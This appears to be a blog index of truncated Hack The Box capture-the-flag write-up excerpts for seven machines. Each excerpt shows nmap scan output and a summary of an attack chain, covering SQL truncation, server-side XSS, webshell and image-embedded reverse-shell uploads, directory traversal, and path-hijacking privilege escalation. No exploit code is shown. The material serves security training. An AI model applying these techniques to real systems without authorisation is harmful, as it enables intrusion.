Information:~$ Title Details Name Admirer IP 10.10.10.187 Difficulty Easy Points 20 OS Linux Brief:~$ Admirer is Easy rated linux box. indeed it was easy but there were a lto of fake credentials.Starting with nmap scan we get robots.txt disallowing admin-dir. On fuzzing admin-dir we get 2 files and from one the file we get credentials for FTP. On doing FTP login we get some files which contain a directory utility-scripts and on fuzing that we get adminer.php. On exploiting adminer Database by setting a remote sql server on our system we get password for waldo user and after that we saw user waldo can run a script as root and we did Python path hijacking and got our root shell Reconnaissance:~$ Nmap Scan:~$ 1 nmap -sC -sV 10.10.10.187 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 # Nmap 7.80 scan initiated Mon May 4 20:11:20 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.187 Nmap scan report for 10.10.10.187 Host is up (0.28s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA) | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA) |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/admin-dir |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Admirer Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 4 20:12:30 2020 -- 1 IP address (1 host up) scanned in 70.66 seconds We get 3 Ports 21(FTP), 22(SSH), 80(HTTP) Port 21 Doesn’t allow Anonymous Login 1 2 3 4 5 6 7...

Information:~$ Title Details Name Book IP 10.10.10.176 Difficulty Medium Points 30 OS Linux Brief:~$ Book is Medium rated linux box. We get initial foothold after doing sql truncate attack to get admin access and then performing Server side XSS to read Private SSH keys. Root was bit complicated then user for root we need to identify the process logrotate and then exploit it using Logrotten to gain root access Reconnaisance:~$ Nmap Scan:~$ 1 nmap -sC -sV 10.10.10.176 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 # Nmap 7.80 scan initiated Fri May 8 14:17:54 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.176 Nmap scan report for book.htb (10.10.10.176) Host is up (0.23s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA) | 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA) |_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: LIBRARY - Read | Learn | Have Fun Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri May 8 14:18:47 2020 -- 1 IP address (1 host up) scanned in 53.84 seconds Let’s Start with Port 80 We get a login form and registeration form. Do a normal registeration and login Few Intersting things I Founded The Contact Us interface indicates that there is an administrator account admin@book.htb The View Profile interface indicates that the current account permissions are User The Collec...

Information:~$ Title Details Name Obscurity IP 10.10.10.168 Difficulty Medium Points 30 OS Linux Brief:~$ Reconnaissance:~$ We will start with basic nmap scan Nmap:~$ 1 nmap -sC -sV 10.10.10.168 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 # Nmap 7.80 scan initiated Wed Feb 26 23:04:36 2020 as: nmap -sC -sV -oA nmap/initial 10.10.10.168 Nmap scan report for 10.10.10.168 Host is up (0.33s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA) | 256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA) |_ 256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519) 80/tcp closed http 8080/tcp open http-proxy BadHTTPServer |_http-server-header: BadHTTPServer |_http-title: 0bscura Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 26 23:05:48 2020 -- 1 IP address (1 host up) scanned in 71.69 seconds Let’s start we with PORT 8080 It shows there is some source code leak Message to server devs: the current source code for the web server is in ‘SuperSecureServer.py’ in the secret development directory Let’s do Fuzzing 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ~/htb/boxes/ROOTED/Obscurity >> ffuf -c -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.168:8080/FUZZ/SuperSecureServer.py /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ ...

Information:~$ Title Details Name Magic IP 10.10.10.185 Difficulty Medium Points 30 OS Linux Brief:~$ Magic is Medium rated linux box which allow us to revise our basic concepts like sql injection, file upload vulnerability. After bypassing login and uploading reverse shell by embedding it into an image we get reverse shell from there we get credentials of mysql and on dumping mysql database we get theseus password. From there we get an SUID binary and on exploiting it by setting PATH variable we are able to gain root access. Reconnaissance:~$ As usual nmap scan Nmap:~$ 1 nmap -sC -sV 10.10.10.185 Nothing Exciting Just 2 Ports 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 # Nmap 7.80 scan initiated Wed Apr 29 16:12:56 2020 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.185 Nmap scan report for 10.10.10.185 Host is up (0.22s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA) | 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA) |_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Magic Portfolio Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Apr 29 16:14:10 2020 -- 1 IP address (1 host up) scanned in 74.76 seconds We get two ports open 22(SSH), 80(HTTP) Let’s take a look at Port 80 Nothing exciting except a login Page link Let’s visit the login page Initial Footh...

Information:~$ Title Details Name Servmon IP 10.10.10.184 Difficulty Easy Points 20 OS Windows Creator thek Brief:~$ Servmon was a easy rated Windows machine that was a bit of a journey as user was pretty easy but root was a hell for me. We got Anonymous FTP login that allowed us to view an interesting file. Initial Foothold was gained by taking advantage of NVMS Server doing Directory Traversal Attack and reading sensitive file wih password for Nadine user. Being a Low privileged user we could read Administrative password of NSClient++ amd by making few API request we were able to gain nt authority\system Shell Reconnaissance:~$ As usual nmap scan Nmap:~$ 1 nmap -sC -sV 10.10.10.184 We get a bunch of Interesting Information 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 # Nmap 7.80 scan initiated Sun Apr 12 20:11:38 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.184 Nmap scan report for 10.10.10.184 Host is up (0.20s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions...

Information:~$ Title Details Name Registry IP 10.10.10.159 Difficulty Hard Points 40 OS Linux Creator thek Brief:~$ Registry was a hard rated Linux machine that was a bit of a journey but a lot of fun for me. The initial foothold was gained by taking advantage of a weak password on a Docker registry which enabled us to download sensitive files, one of which was a private ssh key for the user ‘bolt’ and its passphrase. While enumerating the system, a database file for the Bolt CMS was found which contained a hash for a weak password. Cracking the hash enabled admin access to the CMS, which let us upload a webshell and pivot to the ‘www-data’ user. ‘Www-data’ had sudo access to run a Restic backup, so a Restic REST server was deployed on my attacking machine and a ssh tunnel used to make it appear the rest server was local to Registry. From there, a backup of Registry’s /root folder was run and restored to my attacking machine which included root’s private ssh key. Reconnaissance:~$ We will start with basic nmap scan Nmap:~$ 1 nmap -sC -sV 10.10.10.159 We get a bunch of Interesting Information 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 # Nmap 7.80 scan initiated Tue Feb 4 19:18:31 2020 as: nmap -sC -sV -oA nmap/initial 10.10.10.159 Nmap scan report for 10.10.10.159 Host is up (0.28s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA) | 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA) |_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Welcome to nginx! 443/tcp open ssl/http nginx 1.14.0 (Ubuntu) |_http-...

Information:~$ Title Details Name Traceback IP 10.10.10.181 Difficulty Easy Points 20 OS Linux Creator Xh4H Brief:~$ Traceback is easy rated linux box. Intial foothold can be gained using already available webshells on PORT 80 For Priv Esec sysadmin has by exploiting lua Programming language and for root we can edit the update-mote.d to gain info when logging thorugh SSH Reconnaisance:~$ Nmap Scan:~$ 1 nmap -sC -sV -oN nmap/initial 10.10.10.181 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 # Nmap 7.80 scan initiated Sun Mar 15 20:18:30 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.181 Nmap scan report for 10.10.10.181 Host is up (0.46s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us 3000/tcp filtered ppp Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Mar 15 20:20:03 2020 -- 1 IP address (1 host up) scanned in 93.34 seconds We get 2 Ports Open Lets visit PORT 80 On visiting the Page we get On analyzing the Source code I found 1 2 3 4 5 6 7 8 <body> <center> <h1>This site has been owned</h1> <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2> <h3> - Xh4H - </h3> <!--Some of the best web shells that you might need ;)--> </center> </body> S...